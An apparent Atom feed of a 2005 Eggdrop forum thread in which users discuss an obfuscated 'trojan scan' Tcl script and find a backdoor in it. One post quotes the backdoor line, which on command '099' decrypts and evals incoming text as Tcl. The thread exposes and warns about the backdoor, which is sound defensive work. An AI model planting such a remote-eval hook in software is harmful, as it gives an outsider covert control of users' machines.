<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-gb">
	<link rel="self" type="application/atom+xml" href="https://forum.eggheads.org/app.php/feed/topic/9659" />

	<title>egghelp/eggheads community</title>
	<subtitle>Discussion of eggdrop bots, shell accounts and tcl scripts.</subtitle>
	<link href="https://forum.eggheads.org/index.php" />
	<updated>2005-08-05T15:04:32-04:00</updated>

	<author><name><![CDATA[egghelp/eggheads community]]></name></author>
	<id>https://forum.eggheads.org/app.php/feed/topic/9659</id>

		<entry>
		<author><name><![CDATA[caesar]]></name></author>
		<updated>2005-08-05T15:04:32-04:00</updated>

		<published>2005-08-05T15:04:32-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=53736#p53736</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=53736#p53736"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=53736#p53736"><![CDATA[
Could you guys please end this poitless discussion? Like demond said it's simple, just don't load *obfuscated* TCL scripts on your bot.<br><br>IMHO MeTroiD, no one considered you guilty of something just cos you either think or indeed know the person who made the script. Just relax.<br><br>If someone did a obfuscated TCL script then either he/she has something to hide or dosen't want other people snoop around their code, change a few bits and relase it as it's their own. I tend to think/belive (about the people like strikelight) to prevent other people from snooping around the code. If it's offered for free this dosen't mean you can do WHATEVER you want with it.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=187">caesar</a> — Fri Aug 05, 2005 3:04 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[metroid]]></name></author>
		<updated>2005-08-05T07:48:34-04:00</updated>

		<published>2005-08-05T07:48:34-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=53729#p53729</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=53729#p53729"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=53729#p53729"><![CDATA[
That wasn't was i was saying at all demond. I just know who made it and i believe the other versions weren't encrypted.<br><br>I don't know nor care why that script has things like that as i dont use it anyway.<br>I was just saying that it makes no sense he is saying something after this much time.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5078">metroid</a> — Fri Aug 05, 2005 7:48 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[demond]]></name></author>
		<updated>2005-08-03T18:58:02-04:00</updated>

		<published>2005-08-03T18:58:02-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=53692#p53692</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=53692#p53692"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=53692#p53692"><![CDATA[
<blockquote class="uncited"><div>Wait, you didn't just comment on something i said several months ago did you?<br><br>Seriously, what are you getting at?</div></blockquote>I can't speak for sKy but would guess he/she gets at your apparent endorsement of that particular encrypted/backdoored script<br><br>now, you may know the guy, the guy may be nice &amp; not that type of person who would break into other people's shells, the backdoor may be there by an accident or meant as a service feature and not as break-in mechanism, and the script may be encrypted for educational purposes only - however all of that has nothing to do with the common sense security principle of never running binaries from a source not widely trusted &amp; known to the public - and the fact you know the guy alone hardly makes his script(s) trusted by the public<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5056">demond</a> — Wed Aug 03, 2005 6:58 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[metroid]]></name></author>
		<updated>2005-08-03T18:19:01-04:00</updated>

		<published>2005-08-03T18:19:01-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=53689#p53689</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=53689#p53689"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=53689#p53689"><![CDATA[
Wait, you didn't just comment on something i said several months ago did you?<br><br>Seriously, what are you getting at?<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5078">metroid</a> — Wed Aug 03, 2005 6:19 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[sKy]]></name></author>
		<updated>2005-08-01T22:41:25-04:00</updated>

		<published>2005-08-01T22:41:25-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=53628#p53628</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=53628#p53628"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=53628#p53628"><![CDATA[
<blockquote class="uncited"><div>Guys, i just happen to know who made this script and code get obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malious code in it, which i dont think there is..</div></blockquote>Well, will be nice if you take back your complaint about decrypting scripts. I don`t trust well known people blind. Now you see that he input a backdoor (not by accident(. That wasn`t nice,. I failed to see a regular usage of cmd 99. No one else from outside should be able to execute any tcl commands.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=6101">sKy</a> — Mon Aug 01, 2005 10:41 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[demond]]></name></author>
		<updated>2005-07-18T12:37:17-04:00</updated>

		<published>2005-07-18T12:37:17-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=52793#p52793</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=52793#p52793"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=52793#p52793"><![CDATA[
yep, that allows the guy to execute Tcl commands upon getting a connection initiated by your bot running this sh*t to the aspb (whatever that is) "database"<br><br>bottom line is what we've been saying (well, at least me hehe) over and over and over again on these forums: <strong class="text-strong"><span style="color:red">NEVER RUN ENCRYPTED EGGDROP SCRIPTS, EVER</span></strong> (that is, unless you managed to decrypt and audit it)<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5056">demond</a> — Mon Jul 18, 2005 12:37 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Arie]]></name></author>
		<updated>2005-07-18T10:29:59-04:00</updated>

		<published>2005-07-18T10:29:59-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=52779#p52779</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=52779#p52779"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=52779#p52779"><![CDATA[
the part:<br><div class="codebox"><p>Code: </p><pre><code> } elseif {$cmd == "099"} {            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -&gt; exec; catch { eval [string trim [decrypt aspb $exec]] } </code></pre></div>was a backdoor i heard - dont know tcl =p<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=6494">Arie</a> — Mon Jul 18, 2005 10:29 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[De Kus]]></name></author>
		<updated>2005-05-21T09:42:41-04:00</updated>

		<published>2005-05-21T09:42:41-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49661#p49661</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49661#p49661"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49661#p49661"><![CDATA[
<blockquote class="uncited"><div>Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.</div></blockquote>Since he distributed it under the GNU GPL it would be even illegal to make the source code unaccessable.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=2382">De Kus</a> — Sat May 21, 2005 9:42 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Galadhrim]]></name></author>
		<updated>2005-05-21T04:41:08-04:00</updated>

		<published>2005-05-21T04:41:08-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49653#p49653</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49653#p49653"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49653#p49653"><![CDATA[
maybe make a better decrypter that uses recursiveness.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=2999">Galadhrim</a> — Sat May 21, 2005 4:41 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Sir_Fz]]></name></author>
		<updated>2005-05-20T19:26:22-04:00</updated>

		<published>2005-05-20T19:26:22-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49645#p49645</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49645#p49645"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49645#p49645"><![CDATA[
I forgot to mention, that code was encrypted like 4 times <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_razz.gif" width="15" height="15" alt=":P" title="Razz"> lol, Everytime I decrypted it, it showed me yet another encryption (was about to give up on it <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_razz.gif" width="15" height="15" alt=":P" title="Razz"> ) maybe next time he should try encrypting it endlessly <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_lol.gif" width="15" height="15" alt=":lol:" title="Laughing"><p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3085">Sir_Fz</a> — Fri May 20, 2005 7:26 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Alchera]]></name></author>
		<updated>2005-05-20T18:49:47-04:00</updated>

		<published>2005-05-20T18:49:47-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49643#p49643</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49643#p49643"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49643#p49643"><![CDATA[
I thought only Vulcans used logic?  <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_biggrin.gif" width="15" height="15" alt=":D" title="Very Happy">  <img class="smilies" src="https://forum.eggheads.org/images/smilies/icon_lol.gif" width="15" height="15" alt=":lol:" title="Laughing"><br><br>Bravo one and all.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3646">Alchera</a> — Fri May 20, 2005 6:49 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[^DooM^]]></name></author>
		<updated>2005-05-20T05:57:14-04:00</updated>

		<published>2005-05-20T05:57:14-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49630#p49630</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49630#p49630"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49630#p49630"><![CDATA[
<blockquote class="uncited"><div>Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)<br><br>Besides, it's decrypting, the code is still the same.</div></blockquote>Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3723">^DooM^</a> — Fri May 20, 2005 5:57 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Sir_Fz]]></name></author>
		<updated>2005-05-20T03:43:19-04:00</updated>

		<published>2005-05-20T03:43:19-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49627#p49627</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49627#p49627"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49627#p49627"><![CDATA[
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)<br><br>Besides, it's decrypting, the code is still the same.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3085">Sir_Fz</a> — Fri May 20, 2005 3:43 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[greenbear]]></name></author>
		<updated>2005-05-19T20:38:01-04:00</updated>

		<published>2005-05-19T20:38:01-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49623#p49623</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49623#p49623"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49623#p49623"><![CDATA[
thats just bullshit.  its distributed freely under the gnu licence. if he didnt want ppl to read it, he shouldnt have made it public.<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=24">greenbear</a> — Thu May 19, 2005 8:38 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[metroid]]></name></author>
		<updated>2005-05-19T18:29:42-04:00</updated>

		<published>2005-05-19T18:29:42-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=49615#p49615</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=49615#p49615"/>
		<title type="html"><![CDATA[encrypted trojan scan script (cont.)]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=49615#p49615"><![CDATA[
Guys, i just happen to know who made this script and code get obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malious code in it, which i dont think there is..<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5078">metroid</a> — Thu May 19, 2005 6:29 pm</p><hr />
]]></content>
	</entry>
	</feed>
